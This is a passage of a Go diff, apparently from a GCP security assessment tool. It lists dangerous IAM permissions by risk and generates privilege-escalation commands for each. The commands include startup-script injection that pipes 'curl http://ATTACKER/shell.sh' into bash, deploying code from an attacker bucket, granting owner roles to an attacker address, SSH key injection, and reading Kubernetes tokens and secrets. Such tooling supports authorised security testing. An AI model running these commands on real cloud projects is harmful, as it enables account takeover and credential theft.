"iam.serviceAccounts.getAccessToken", Category: "SA Impersonation", RiskLevel: "CRITICAL", Description: "Generate access tokens for any SA (AWS: sts:AssumeRole)"}, + {Permission: "iam.serviceAccounts.signBlob", Category: "SA Impersonation", RiskLevel: "CRITICAL", Description: "Sign blobs as SA for GCS signed URLs or custom auth"}, + {Permission: "iam.serviceAccounts.signJwt", Category: "SA Impersonation", RiskLevel: "CRITICAL", Description: "Sign JWTs as SA for custom authentication flows"}, + {Permission: "iam.serviceAccounts.implicitDelegation", Category: "SA Impersonation", RiskLevel: "CRITICAL", Description: "Chain impersonation through intermediary SAs"}, + {Permission: "iam.serviceAccounts.getOpenIdToken", Category: "SA Impersonation", RiskLevel: "HIGH", Description: "Generate OIDC tokens for workload identity federation"}, + + // ========================================== + // KEY/CREDENTIAL CREATION - CRITICAL + // AWS equivalent: iam:CreateAccessKey + // ========================================== + {Permission: "iam.serviceAccountKeys.create", Category: "Key Creation", RiskLevel: "CRITICAL", Description: "Create persistent SA keys (AWS: iam:CreateAccessKey)"}, + {Permission: "iam.serviceAccountKeys.delete", Category: "Key Creation", RiskLevel: "HIGH", Description: "Delete existing keys to create new ones (bypass 10-key limit)"}, {Permission: "storage.hmacKeys.create", Category: "Key Creation", RiskLevel: "HIGH", Description: "Create HMAC keys for S3-compatible access"}, - - // IAM Modification - CRITICAL - {Permission: "resourcemanager.projects.setIamPolicy", Category: "IAM Modification", RiskLevel: "CRITICAL", Description: "Modify project-level IAM policy"}, - {Permission: "resourcemanager.folders.setIamPolicy", Category: "IAM Modification", RiskLevel: "CRITICAL", Description: "Modify folder-level IAM policy"}, - {Permission: "resourcemanager.organizations.setIamPolicy", Category: "IAM Modification", RiskLevel: "CRITICAL", Description: "Modify org-level IAM policy"}, - {Permission: "iam.serviceAccounts.setIamPolicy", Category: "IAM Modification", RiskLevel: "CRITICAL", Description: "Grant access to service accounts"}, - {Permission: "iam.roles.update", Category: "IAM Modification", RiskLevel: "CRITICAL", Description: "Modify custom role permissions"}, - {Permission: "iam.roles.create", Category: "IAM Modification", RiskLevel: "HIGH", Description: "Create new custom roles"}, - - // Resource-specific IAM Modification - HIGH - {Permission: "pubsub.topics.setIamPolicy", Category: "IAM Modification", RiskLevel: "HIGH", Description: "Modify Pub/Sub topic IAM policy"}, - {Permission: "pubsub.subscriptions.setIamPolicy", Category: "IAM Modification", RiskLevel: "HIGH", Description: "Modify Pub/Sub subscription IAM policy"}, - {Permission: "bigquery.datasets.setIamPolicy", Category: "IAM Modification", RiskLevel: "HIGH", Description: "Modify BigQuery dataset IAM policy"}, - {Permission: "artifactregistry.repositories.setIamPolicy", Category: "IAM Modification", RiskLevel: "HIGH", Description: "Modify Artifact Registry IAM policy"}, - {Permission: "compute.instances.setIamPolicy", Category: "IAM Modification", RiskLevel: "HIGH", Description: "Modify Compute instance IAM policy"}, - - // Compute Access - HIGH - {Permission: "compute.instances.create", Category: "Compute", RiskLevel: "HIGH", Description: "Create compute instances with SA"}, - {Permission: "compute.instances.setMetadata", Category: "Compute", RiskLevel: "HIGH", Description: "Modify instance metadata (SSH keys, startup scripts)"}, - {Permission: "compute.instances.setServiceAccount", Category: "Compute", RiskLevel: "HIGH", Description: "Change instance service account"}, - {Permission: "compute.projects.setCommonInstanceMetadata", Category: "Compute", RiskLevel: "HIGH", Description: "Modify project-wide metadata"}, - {Permission: "compute.instances.osLogin", Category: "Compute", RiskLevel: "MEDIUM", Description: "SSH into instances via OS Login"}, + {Permission: "apikeys.keys.create", Category: "Key Creation", RiskLevel: "MEDIUM", Description: "Create API keys for service access"}, + + // ========================================== + // IAM POLICY MODIFICATION - CRITICAL + // AWS equivalent: iam:PutRolePolicy, iam:AttachRolePolicy, iam:CreatePolicyVersion + // ========================================== + {Permission: "resourcemanager.projects.setIamPolicy", Category: "IAM Modification", RiskLevel: "CRITICAL", Description: "Modify project IAM - grant any role to any principal"}, + {Permission: "resourcemanager.folders.setIamPolicy", Category: "IAM Modification", RiskLevel: "CRITICAL", Description: "Modify folder IAM - affects all child projects"}, + {Permission: "resourcemanager.organizations.setIamPolicy", Category: "IAM Modification", RiskLevel: "CRITICAL", Description: "Modify org IAM - affects entire organization"}, + {Permission: "iam.serviceAccounts.setIamPolicy", Category: "IAM Modification", RiskLevel: "CRITICAL", Description: "Grant impersonation access to service accounts"}, + {Permission: "iam.roles.update", Category: "IAM Modification", RiskLevel: "CRITICAL", Description: "Add permissions to custom roles (AWS: iam:CreatePolicyVersion)"}, + {Permission: "iam.roles.create", Category: "IAM Modification", RiskLevel: "HIGH", Description: "Create custom roles with dangerous permissions"}, + {Permission: "iam.roles.delete", Category: "IAM Modification", RiskLevel: "MEDIUM", Description: "Delete roles to disrupt access controls"}, + + // Resource-level IAM Modification + {Permission: "storage.buckets.setIamPolicy", Category: "IAM Modification", RiskLevel: "HIGH", Description: "Grant access to storage buckets"}, + {Permission: "pubsub.topics.setIamPolicy", Category: "IAM Modification", RiskLevel: "HIGH", Description: "Grant access to Pub/Sub topics"}, + {Permission: "pubsub.subscriptions.setIamPolicy", Category: "IAM Modification", RiskLevel: "HIGH", Description: "Grant access to Pub/Sub subscriptions"}, + {Permission: "bigquery.datasets.setIamPolicy", Category: "IAM Modification", RiskLevel: "HIGH", Description: "Grant access to BigQuery datasets"}, + {Permission: "artifactregistry.repositories.setIamPolicy", Category: "IAM Modification", RiskLevel: "HIGH", Description: "Grant access to container/artifact registries"}, + {Permission: "compute.instances.setIamPolicy", Category: "IAM Modification", RiskLevel: "HIGH", Description: "Grant OS Login access to instances"}, + {Permission: "compute.images.setIamPolicy", Category: "IAM Modification", RiskLevel: "HIGH", Description: "Share VM images with external projects"}, + {Permission: "compute.snapshots.setIamPolicy", Category: "IAM Modification", RiskLevel: "HIGH", Description: "Share disk snapshots with external projects"}, + {Permission: "kms.cryptoKeys.setIamPolicy", Category: "IAM Modification", RiskLevel: "HIGH", Description: "Grant access to encryption keys"}, + + // ========================================== + // COMPUTE + SA USAGE (PassRole equivalent) + // AWS equivalent: iam:PassRole + ec2:RunInstances + // ========================================== + {Permission: "compute.instances.create", Category: "Compute", RiskLevel: "HIGH", Description: "Create VMs with attached SA (AWS: PassRole+RunInstances)"}, + {Permission: "compute.instances.setServiceAccount", Category: "Compute", RiskLevel: "HIGH", Description: "Change instance SA to escalate privileges"}, + {Permission: "compute.instances.setMetadata", Category: "Compute", RiskLevel: "HIGH", Description: "Inject SSH keys or startup scripts"}, + {Permission: "compute.projects.setCommonInstanceMetadata", Category: "Compute", RiskLevel: "CRITICAL", Description: "Inject SSH keys project-wide"}, + {Permission: "compute.instances.osLogin", Category: "Compute", RiskLevel: "MEDIUM", Description: "SSH access via OS Login (AWS: ssm:StartSession)"}, {Permission: "compute.instances.osAdminLogin", Category: "Compute", RiskLevel: "HIGH", Description: "SSH with sudo via OS Login"}, - - // Cloud Functions - HIGH - {Permission: "cloudfunctions.functions.create", Category: "Serverless", RiskLevel: "HIGH", Description: "Deploy functions with SA identity"}, - {Permission: "cloudfunctions.functions.update", Category: "Serverless", RiskLevel: "HIGH", Description: "Modify function code/SA"}, - {Permission: "cloudfunctions.functions.sourceCodeSet", Category: "Serverless", RiskLevel: "HIGH", Description: "Change function source code"}, - {Permission: "cloudfunctions.functions.setIamPolicy", Category: "Serverless", RiskLevel: "HIGH", Description: "Modify function IAM policy (make public)"}, - - // Cloud Run - HIGH - {Permission: "run.services.create", Category: "Serverless", RiskLevel: "HIGH", Description: "Deploy services with SA identity"}, - {Permission: "run.services.update", Category: "Serverless", RiskLevel: "HIGH", Description: "Modify service code/SA"}, - {Permission: "run.services.setIamPolicy", Category: "Serverless", RiskLevel: "HIGH", Description: "Modify service IAM policy (make public)"}, - {Permission: "run.jobs.create", Category: "Serverless", RiskLevel: "HIGH", Description: "Create Cloud Run jobs with SA identity"}, - {Permission: "run.jobs.update", Category: "Serverless", RiskLevel: "HIGH", Description: "Modify Cloud Run job code/SA"}, - - // Data Processing - HIGH - {Permission: "dataproc.clusters.create", Category: "Data Processing", RiskLevel: "HIGH", Description: "Create Dataproc clusters with SA identity"}, - {Permission: "dataproc.jobs.create", Category: "Data Processing", RiskLevel: "HIGH", Description: "Submit jobs to Dataproc clusters"}, - {Permission: "dataflow.jobs.create", Category: "Data Processing", RiskLevel: "HIGH", Description: "Create Dataflow jobs with SA identity"}, - - // Cloud Composer - CRITICAL - {Permission: "composer.environments.create", Category: "Orchestration", RiskLevel: "CRITICAL", Description: "Create Composer environments with SA identity"}, - {Permission: "composer.environments.update", Category: "Orchestration", RiskLevel: "CRITICAL", Description: "Modify Composer environment configuration"}, - - // Cloud Build - CRITICAL - {Permission: "cloudbuild.builds.create", Category: "CI/CD", RiskLevel: "CRITICAL", Description: "Run builds with Cloud Build SA"}, - - // GKE - HIGH - {Permission: "container.clusters.getCredentials", Category: "GKE", RiskLevel: "HIGH", Description: "Get GKE cluster credentials"}, - {Permission: "container.pods.exec", Category: "GKE", RiskLevel: "HIGH", Description: "Exec into pods"}, + {Permission: "compute.instanceTemplates.create", Category: "Compute", RiskLevel: "HIGH", Description: "Create templates with SA for MIG exploitation"}, + + // ========================================== + // SERVERLESS + SA USAGE (PassRole equivalent) + // AWS equivalent: iam:PassRole + lambda:CreateFunction + // ========================================== + {Permission: "cloudfunctions.functions.create", Category: "Serverless", RiskLevel: "HIGH", Description: "Deploy functions with SA (AWS: PassRole+Lambda)"}, + {Permission: "cloudfunctions.functions.update", Category: "Serverless", RiskLevel: "HIGH", Description: "Modify function code or SA"}, + {Permission: "cloudfunctions.functions.sourceCodeSet", Category: "Serverless", RiskLevel: "HIGH", Description: "Replace function source code"}, + {Permission: "cloudfunctions.functions.setIamPolicy", Category: "Serverless", RiskLevel: "HIGH", Description: "Make functions publicly invocable"}, + + // Cloud Run (AWS: ECS/Fargate equivalent) + {Permission: "run.services.create", Category: "Serverless", RiskLevel: "HIGH", Description: "Deploy services with SA (AWS: PassRole+ECS)"}, + {Permission: "run.services.update", Category: "Serverless", RiskLevel: "HIGH", Description: "Modify service image or SA"}, + {Permission: "run.services.setIamPolicy", Category: "Serverless", RiskLevel: "HIGH", Description: "Make services publicly accessible"}, + {Permission: "run.jobs.create", Category: "Serverless", RiskLevel: "HIGH", Description: "Create jobs with SA identity"}, + {Permission: "run.jobs.update", Category: "Serverless", RiskLevel: "HIGH", Description: "Modify job configuration or SA"}, + {Permission: "run.jobs.run", Category: "Serverless", RiskLevel: "HIGH", Description: "Execute jobs with attached SA"}, + + // ========================================== + // DATA PROCESSING + SA USAGE (PassRole equivalent) + // AWS equivalent: iam:PassRole + glue:CreateDevEndpoint, datapipeline:* + // ========================================== + {Permission: "dataproc.clusters.create", Category: "Data Processing", RiskLevel: "HIGH", Description: "Create Dataproc with SA (AWS: PassRole+Glue)"}, + {Permission: "dataproc.clusters.update", Category: "Data Processing", RiskLevel: "HIGH", Description: "Modify cluster SA or configuration"}, + {Permission: "dataproc.jobs.create", Category: "Data Processing", RiskLevel: "HIGH", Description: "Submit jobs to clusters"}, + {Permission: "dataproc.jobs.update", Category: "Data Processing", RiskLevel: "HIGH", Description: "Modify running jobs"}, + {Permission: "dataflow.jobs.create", Category: "Data Processing", RiskLevel: "HIGH", Description: "Create Dataflow jobs with SA (AWS: DataPipeline)"}, + {Permission: "dataflow.jobs.update", Category: "Data Processing", RiskLevel: "HIGH", Description: "Modify Dataflow job configuration"}, + + // ========================================== + // ML/AI PLATFORMS + SA USAGE + // AWS equivalent: iam:PassRole + sagemaker:CreateNotebookInstance + // ========================================== + {Permission: "notebooks.instances.create", Category: "AI/ML", RiskLevel: "HIGH", Description: "Create Vertex AI Workbench with SA (AWS: PassRole+SageMaker)"}, + {Permission: "notebooks.instances.update", Category: "AI/ML", RiskLevel: "HIGH", Description: "Modify notebook SA or configuration"}, + {Permission: "notebooks.instances.setIamPolicy", Category: "AI/ML", RiskLevel: "HIGH", Description: "Grant access to notebook instances"}, + {Permission: "aiplatform.customJobs.create", Category: "AI/ML", RiskLevel: "HIGH", Description: "Run custom training jobs with SA"}, + {Permission: "aiplatform.pipelineJobs.create", Category: "AI/ML", RiskLevel: "HIGH", Description: "Create ML pipelines with SA"}, + + // ========================================== + // ORCHESTRATION (Composer = AWS equivalent of Step Functions/MWAA) + // ========================================== + {Permission: "composer.environments.create", Category: "Orchestration", RiskLevel: "CRITICAL", Description: "Create Composer/Airflow with SA"}, + {Permission: "composer.environments.update", Category: "Orchestration", RiskLevel: "CRITICAL", Description: "Modify Composer environment SA"}, + + // Cloud Scheduler (AWS: EventBridge/CloudWatch Events) + {Permission: "cloudscheduler.jobs.create", Category: "Orchestration", RiskLevel: "HIGH", Description: "Create scheduled jobs with SA"}, + {Permission: "cloudscheduler.jobs.update", Category: "Orchestration", RiskLevel: "HIGH", Description: "Modify scheduled job SA or target"}, + + // Cloud Tasks (AWS: SQS + Lambda triggers) + {Permission: "cloudtasks.tasks.create", Category: "Orchestration", RiskLevel: "HIGH", Description: "Create tasks with SA for HTTP targets"}, + {Permission: "cloudtasks.queues.create", Category: "Orchestration", RiskLevel: "MEDIUM", Description: "Create task queues"}, + + // ========================================== + // CI/CD (Cloud Build = AWS CodeBuild) + // AWS equivalent: iam:PassRole + codebuild:CreateProject + // ========================================== + {Permission: "cloudbuild.builds.create", Category: "CI/CD", RiskLevel: "CRITICAL", Description: "Run builds with Cloud Build SA (AWS: PassRole+CodeBuild)"}, + {Permission: "cloudbuild.builds.update", Category: "CI/CD", RiskLevel: "HIGH", Description: "Modify build configuration"}, + {Permission: "source.repos.update", Category: "CI/CD", RiskLevel: "HIGH", Description: "Modify source repositories for build injection"}, + + // ========================================== + // INFRASTRUCTURE AS CODE + // AWS equivalent: iam:PassRole + cloudformation:CreateStack + // ========================================== + {Permission: "deploymentmanager.deployments.create", Category: "IaC", RiskLevel: "CRITICAL", Description: "Deploy infra with DM SA (AWS: PassRole+CloudFormation)"}, + {Permission: "deploymentmanager.deployments.update", Category: "IaC", RiskLevel: "HIGH", Description: "Modify deployment templates"}, + + // ========================================== + // KUBERNETES/GKE + // AWS equivalent: eks:* permissions + // ========================================== + {Permission: "container.clusters.create", Category: "GKE", RiskLevel: "HIGH", Description: "Create GKE clusters with node SA"}, + {Permission: "container.clusters.update", Category: "GKE", RiskLevel: "HIGH", Description: "Modify cluster node SA or config"}, + {Permission: "container.clusters.getCredentials", Category: "GKE", RiskLevel: "HIGH", Description: "Get cluster credentials"}, + {Permission: "container.pods.create", Category: "GKE", RiskLevel: "HIGH", Description: "Deploy pods with SA"}, + {Permission: "container.pods.exec", Category: "GKE", RiskLevel: "HIGH", Description: "Exec into pods to steal credentials"}, {Permission: "container.secrets.get", Category: "GKE", RiskLevel: "HIGH", Description: "Read Kubernetes secrets"}, - - // Secrets - HIGH - {Permission: "secretmanager.versions.access", Category: "Secrets", RiskLevel: "HIGH", Description: "Access secret values"}, + {Permission: "container.secrets.create", Category: "GKE", RiskLevel: "MEDIUM", Description: "Create K8s secrets for later access"}, + {Permission: "container.serviceAccounts.createToken", Category: "GKE", RiskLevel: "HIGH", Description: "Generate K8s SA tokens"}, + + // ========================================== + // SECRETS & CREDENTIAL ACCESS + // AWS equivalent: secretsmanager:GetSecretValue, ssm:GetParameter + // ========================================== + {Permission: "secretmanager.versions.access", Category: "Secrets", RiskLevel: "HIGH", Description: "Access secret values (credentials, API keys)"}, {Permission: "secretmanager.secrets.setIamPolicy", Category: "Secrets", RiskLevel: "HIGH", Description: "Grant access to secrets"}, - - // Deployment Manager - CRITICAL - {Permission: "deploymentmanager.deployments.create", Category: "Deployment", RiskLevel: "CRITICAL", Description: "Deploy arbitrary infrastructure with DM SA"}, - - // Workload Identity Federation - CRITICAL - {Permission: "iam.workloadIdentityPools.create", Category: "Federation", RiskLevel: "CRITICAL", Description: "Create workload identity pools for external access"}, - {Permission: "iam.workloadIdentityPoolProviders.create", Category: "Federation", RiskLevel: "CRITICAL", Description: "Create identity providers for external impersonation"}, - - // Org Policies - CRITICAL - {Permission: "orgpolicy.policy.set", Category: "Org Policy", RiskLevel: "CRITICAL", Description: "Disable organization policy constraints"}, - - // SA Usage - {Permission: "iam.serviceAccounts.actAs", Category: "SA Usage", RiskLevel: "HIGH", Description: "Use SA for resource creation"}, + {Permission: "secretmanager.secrets.create", Category: "Secrets", RiskLevel: "MEDIUM", Description: "Create secrets for persistence"}, + + // ========================================== + // WORKLOAD IDENTITY FEDERATION + // AWS equivalent: iam:CreateOpenIDConnectProvider, iam:CreateSAMLProvider + // ========================================== + {Permission: "iam.workloadIdentityPools.create", Category: "Federation", RiskLevel: "CRITICAL", Description: "Create pools for external identity access"}, + {Permission: "iam.workloadIdentityPools.update", Category: "Federation", RiskLevel: "HIGH", Description: "Modify pool configuration"}, + {Permission: "iam.workloadIdentityPoolProviders.create", Category: "Federation", RiskLevel: "CRITICAL", Description: "Create providers for external impersonation"}, + {Permission: "iam.workloadIdentityPoolProviders.update", Category: "Federation", RiskLevel: "HIGH", Description: "Modify provider configuration"}, + + // ========================================== + // ORG POLICIES & CONSTRAINTS + // AWS equivalent: organizations:* SCP modifications + // ========================================== + {Permission: "orgpolicy.policy.set", Category: "Org Policy", RiskLevel: "CRITICAL", Description: "Disable security constraints org-wide"}, + {Permission: "orgpolicy.constraints.list", Category: "Org Policy", RiskLevel: "LOW", Description: "Enumerate security constraints"}, + {Permission: "essentialcontacts.contacts.delete", Category: "Org Policy", RiskLevel: "MEDIUM", Description: "Remove security notification contacts"}, + + // ========================================== + // SERVICE ACCOUNT USAGE (Required for most PassRole equivalents) + // AWS equivalent: iam:PassRole + // ========================================== + {Permission: "iam.serviceAccounts.actAs", Category: "SA Usage", RiskLevel: "HIGH", Description: "Use SA for resource creation (AWS: iam:PassRole)"}, + + // ========================================== + // NETWORK ACCESS FOR LATERAL MOVEMENT + // AWS equivalent: ec2:CreateNetworkInterface, ec2:ModifyInstanceAttribute + // ========================================== + {Permission: "iap.tunnelInstances.accessViaIAP", Category: "Network Access", RiskLevel: "MEDIUM", Description: "Access instances via IAP tunnel"}, + {Permission: "compute.firewalls.create", Category: "Network Access", RiskLevel: "HIGH", Description: "Create firewall rules for access"}, + {Permission: "compute.firewalls.update", Category: "Network Access", RiskLevel: "HIGH", Description: "Modify firewall rules"}, + + // ========================================== + // BILLING & RESOURCE CREATION + // Could be used to exhaust quotas or create resources + // ========================================== + {Permission: "billing.accounts.getIamPolicy", Category: "Billing", RiskLevel: "LOW", Description: "View billing IAM for enumeration"}, + {Permission: "billing.accounts.setIamPolicy", Category: "Billing", RiskLevel: "HIGH", Description: "Grant billing access"}, } } @@ -1025,31 +1125,161 @@ func generateLateralCommand(permission, projectID, scopeID string) string { func generatePrivescCommand(permission, projectID, scopeID string) string { switch permission { + // Service Account Impersonation case "iam.serviceAccounts.getAccessToken": return fmt.Sprintf("gcloud auth print-access-token --impersonate-service-account=TARGET_SA@%s.iam.gserviceaccount.com", projectID) - case "iam.serviceAccountKeys.create": - return fmt.Sprintf("gcloud iam service-accounts keys create key.json --iam-account=TARGET_SA@%s.iam.gserviceaccount.com", projectID) case "iam.serviceAccounts.signBlob": - return fmt.Sprintf("# Sign blob as SA: gcloud iam service-accounts sign-blob --iam-account=TARGET_SA@%s.iam.gserviceaccount.com", projectID) + return fmt.Sprintf("gcloud iam service-accounts sign-blob input.txt output.sig --iam-account=TARGET_SA@%s.iam.gserviceaccount.com", projectID) case "iam.serviceAccounts.signJwt": - return fmt.Sprintf("# Sign JWT as SA: gcloud iam service-accounts sign-jwt --iam-account=TARGET_SA@%s.iam.gserviceaccount.com", projectID) + return fmt.Sprintf("gcloud iam service-accounts sign-jwt jwt.json signed.jwt --iam-account=TARGET_SA@%s.iam.gserviceaccount.com", projectID) + case "iam.serviceAccounts.implicitDelegation": + return fmt.Sprintf("# Chain through intermediary SA: gcloud auth print-access-token --impersonate-service-account=TARGET_SA@%s.iam.gserviceaccount.com", projectID) + case "iam.serviceAccounts.getOpenIdToken": + return fmt.Sprintf("gcloud auth print-identity-token --impersonate-service-account=TARGET_SA@%s.iam.gserviceaccount.com --audiences=https://TARGET", projectID) + + // Key Creation + case "iam.serviceAccountKeys.create": + return fmt.Sprintf("gcloud iam service-accounts keys create key.json --iam-account=TARGET_SA@%s.iam.gserviceaccount.com", projectID) + case "iam.serviceAccountKeys.delete": + return fmt.Sprintf("gcloud iam service-accounts keys delete KEY_ID --iam-account=TARGET_SA@%s.iam.gserviceaccount.com", projectID) + case "storage.hmacKeys.create": + return fmt.Sprintf("gcloud storage hmac create TARGET_SA@%s.iam.gserviceaccount.com", projectID) + case "apikeys.keys.create": + return fmt.Sprintf("gcloud alpha services api-keys create --project=%s", projectID) + + // IAM Policy Modification case "resourcemanager.projects.setIamPolicy": - return fmt.Sprintf("gcloud projects add-iam-policy-binding %s --member=user:ATTACKER --role=roles/owner", projectID) + return fmt.Sprintf("gcloud projects add-iam-policy-binding %s --member=user:ATTACKER@gmail.com --role=roles/owner", projectID) case "resourcemanager.folders.setIamPolicy": - return fmt.Sprintf("gcloud resource-manager folders add-iam-policy-binding %s --member=user:ATTACKER --role=roles/owner", scopeID) + return fmt.Sprintf("gcloud resource-manager folders add-iam-policy-binding %s --member=user:ATTACKER@gmail.com --role=roles/owner", scopeID) case "resourcemanager.organizations.setIamPolicy": - return fmt.Sprintf("gcloud organizations add-iam-policy-binding %s --member=user:ATTACKER --role=roles/owner", scopeID) + return fmt.Sprintf("gcloud organizations add-iam-policy-binding %s --member=user:ATTACKER@gmail.com --role=roles/owner", scopeID) + case "iam.serviceAccounts.setIamPolicy": + return fmt.Sprintf("gcloud iam service-accounts add-iam-policy-binding %s --member=user:ATTACKER@gmail.com --role=roles/iam.serviceAccountTokenCreator", scopeID) + case "iam.roles.update": + return fmt.Sprintf("gcloud iam roles update ROLE_ID --project=%s --add-permissions=iam.serviceAccounts.getAccessToken", projectID) + case "iam.roles.create": + return fmt.Sprintf("gcloud iam roles create privesc_role --project=%s --permissions=iam.serviceAccounts.getAccessToken,iam.serviceAccountKeys.create", projectID) + + // Resource-level IAM + case "storage.buckets.setIamPolicy": + return fmt.Sprintf("gsutil iam ch user:ATTACKER@gmail.com:objectAdmin gs://%s", scopeID) + case "pubsub.topics.setIamPolicy": + return fmt.Sprintf("gcloud pubsub topics add-iam-policy-binding %s --member=user:ATTACKER@gmail.com --role=roles/pubsub.publisher --project=%s", scopeID, projectID) + case "bigquery.datasets.setIamPolicy": + return fmt.Sprintf("bq update --source=dataset_acl.json %s:%s", projectID, scopeID) + case "secretmanager.secrets.setIamPolicy": + return fmt.Sprintf("gcloud secrets add-iam-policy-binding %s --member=user:ATTACKER@gmail.com --role=roles/secretmanager.secretAccessor --project=%s", scopeID, projectID) + case "kms.cryptoKeys.setIamPolicy": + return fmt.Sprintf("gcloud kms keys add-iam-policy-binding KEY --keyring=KEYRING --location=LOCATION --member=user:ATTACKER@gmail.com --role=roles/cloudkms.cryptoKeyDecrypter --project=%s", projectID) + + // Compute + case "compute.instances.create": + return fmt.Sprintf("gcloud compute instances create pwn-vm --service-account=TARGET_SA@%s.iam.gserviceaccount.com --scopes=cloud-platform --zone=us-central1-a --project=%s", projectID, projectID) + case "compute.instances.setServiceAccount": + return fmt.Sprintf("gcloud compute instances set-service-account INSTANCE --service-account=TARGET_SA@%s.iam.gserviceaccount.com --zone=ZONE --project=%s", projectID, projectID) case "compute.instances.setMetadata": - return fmt.Sprintf("gcloud compute instances add-metadata INSTANCE --zone=ZONE --metadata=startup-script='#!/bin/bash\\ncurl ATTACKER' --project=%s", projectID) + return fmt.Sprintf("gcloud compute instances add-metadata INSTANCE --zone=ZONE --metadata=startup-script='curl http://ATTACKER/shell.sh|bash' --project=%s", projectID) + case "compute.projects.setCommonInstanceMetadata": + return fmt.Sprintf("gcloud compute project-info add-metadata --metadata=ssh-keys=\"attacker:$(cat ~/.ssh/id_rsa.pub)\" --project=%s", projectID) + case "compute.instances.osLogin": + return fmt.Sprintf("gcloud compute ssh INSTANCE --zone=ZONE --project=%s", projectID) + case "compute.instances.osAdminLogin": + return fmt.Sprintf("gcloud compute ssh INSTANCE --zone=ZONE --project=%s # Then: sudo su", projectID) + case "compute.instanceTemplates.create": + return fmt.Sprintf("gcloud compute instance-templates create pwn-template --service-account=TARGET_SA@%s.iam.gserviceaccount.com --scopes=cloud-platform --project=%s", projectID, projectID) + + // Cloud Functions case "cloudfunctions.functions.create": - return fmt.Sprintf("gcloud functions deploy pwn --runtime=python39 --trigger-http --project=%s --service-account=TARGET_SA", projectID) + return fmt.Sprintf("gcloud functions deploy pwn --runtime=python39 --trigger-http --service-account=TARGET_SA@%s.iam.gserviceaccount.com --entry-point=main --source=. --project=%s", projectID, projectID) + case "cloudfunctions.functions.update": + return fmt.Sprintf("gcloud functions deploy EXISTING_FUNC --service-account=TARGET_SA@%s.iam.gserviceaccount.com --project=%s", projectID, projectID) + case "cloudfunctions.functions.sourceCodeSet": + return fmt.Sprintf("gcloud functions deploy FUNC --source=gs://ATTACKER_BUCKET/malicious.zip --project=%s", projectID) + case "cloudfunctions.functions.setIamPolicy": + return fmt.Sprintf("gcloud functions add-iam-policy-binding FUNC --member=allUsers --role=roles/cloudfunctions.invoker --project=%s", projectID) + + // Cloud Run case "run.services.create": - return fmt.Sprintf("gcloud run deploy pwn --image=ATTACKER_IMAGE --project=%s --service-account=TARGET_SA", projectID) + return fmt.Sprintf("gcloud run deploy pwn --image=ATTACKER_IMAGE --service-account=TARGET_SA@%s.iam.gserviceaccount.com --allow-unauthenticated --region=us-central1 --project=%s", projectID, projectID) + case "run.services.update": + return fmt.Sprintf("gcloud run services update SERVICE --service-account=TARGET_SA@%s.iam.gserviceaccount.com --region=us-central1 --project=%s", projectID, projectID) + case "run.jobs.create": + return fmt.Sprintf("gcloud run jobs create pwn-job --image=ATTACKER_IMAGE --service-account=TARGET_SA@%s.iam.gserviceaccount.com --region=us-central1 --project=%s", projectID, projectID) + case "run.jobs.run": + return fmt.Sprintf("gcloud run jobs execute JOB_NAME --region=us-central1 --project=%s", projectID) + + // Data Processing + case "dataproc.clusters.create": + return fmt.Sprintf("gcloud dataproc clusters create pwn-cluster --service-account=TARGET_SA@%s.iam.gserviceaccount.com --region=us-central1 --project=%s", projectID, projectID) + case "dataproc.jobs.create": + return fmt.Sprintf("gcloud dataproc jobs submit pyspark gs://ATTACKER/pwn.py --cluster=CLUSTER --region=us-central1 --project=%s", projectID) + case "dataflow.jobs.create": + return fmt.Sprintf("gcloud dataflow jobs run pwn-job --gcs-location=gs://dataflow-templates/latest/... --service-account-email=TARGET_SA@%s.iam.gserviceaccount.com --region=us-central1 --project=%s", projectID, projectID) + + // AI/ML + case "notebooks.instances.create": + return fmt.Sprintf("gcloud notebooks instances create pwn-notebook --location=us-central1-a --service-account=TARGET_SA@%s.iam.gserviceaccount.com --project=%s", projectID, projectID) + case "aiplatform.customJobs.create": + return fmt.Sprintf("gcloud ai custom-jobs create --display-name=pwn-job --worker-pool-spec=... --service-account=TARGET_SA@%s.iam.gserviceaccount.com --region=us-central1 --project=%s", projectID, projectID) + + // Orchestration + case "composer.environments.create": + return fmt.Sprintf("gcloud composer environments create pwn-env --location=us-central1 --service-account=TARGET_SA@%s.iam.gserviceaccount.com --project=%s", projectID, projectID) + case "cloudscheduler.jobs.create": + return fmt.Sprintf("gcloud scheduler jobs create http pwn-job --schedule='* * * * *' --uri=https://TARGET --oidc-service-account-email=TARGET_SA@%s.iam.gserviceaccount.com --project=%s", projectID, projectID) + case "cloudtasks.tasks.create": + return fmt.Sprintf("gcloud tasks create-http-task --queue=QUEUE --url=https://TARGET --oidc-service-account-email=TARGET_SA@%s.iam.gserviceaccount.com --project=%s", projectID, projectID) + + // CI/CD case "cloudbuild.builds.create": - return fmt.Sprintf("gcloud builds submit --config=cloudbuild.yaml --project=%s", projectID) + return fmt.Sprintf("gcloud builds submit --config=cloudbuild.yaml --project=%s # cloudbuild.yaml runs as Cloud Build SA", projectID) + case "source.repos.update": + return fmt.Sprintf("gcloud source repos clone REPO --project=%s # Modify code for build injection", projectID) + + // Deployment Manager + case "deploymentmanager.deployments.create": + return fmt.Sprintf("gcloud deployment-manager deployments create pwn-deploy --config=config.yaml --project=%s # config.yaml creates privileged resources", projectID) + + // GKE + case "container.clusters.create": + return fmt.Sprintf("gcloud container clusters create pwn-cluster --service-account=TARGET_SA@%s.iam.gserviceaccount.com --zone=us-central1-a --project=%s", projectID, projectID) + case "container.clusters.getCredentials": + return fmt.Sprintf("gcloud container clusters get-credentials CLUSTER --zone=ZONE --project=%s", projectID) + case "container.pods.create": + return fmt.Sprintf("kubectl run pwn --image=ATTACKER_IMAGE --serviceaccount=TARGET_SA") case "container.pods.exec": - return fmt.Sprintf("kubectl exec -it POD -- /bin/sh") + return "kubectl exec -it POD -- /bin/sh # Then: cat /var/run/secrets/kubernetes.io/serviceaccount/token" + case "container.secrets.get": + return "kubectl get secret SECRET -o jsonpath='{.data}' | base64 -d" + case "container.serviceAccounts.createToken": + return "kubectl create token SERVICE_ACCOUNT --duration=999999h" + + // Secrets + case "secretmanager.versions.access": + return fmt.Sprintf("gcloud secrets versions access latest --secret=SECRET_NAME --project=%s", projectID) + + // Workload Identity Federation + case "iam.workloadIdentityPools.create": + return fmt.Sprintf("gcloud iam workload-identity-pools create pwn-pool --location=global --project=%s", projectID) + case "iam.workloadIdentityPoolProviders.create": + return fmt.Sprintf("gcloud iam workload-identity-pools providers create-oidc pwn-provider --location=global --workload-identity-pool=POOL --issuer-uri=https://ATTACKER --project=%s", projectID) + + // Org Policies + case "orgpolicy.policy.set": + return fmt.Sprintf("gcloud org-policies set-policy policy.yaml --project=%s # Disable constraints like 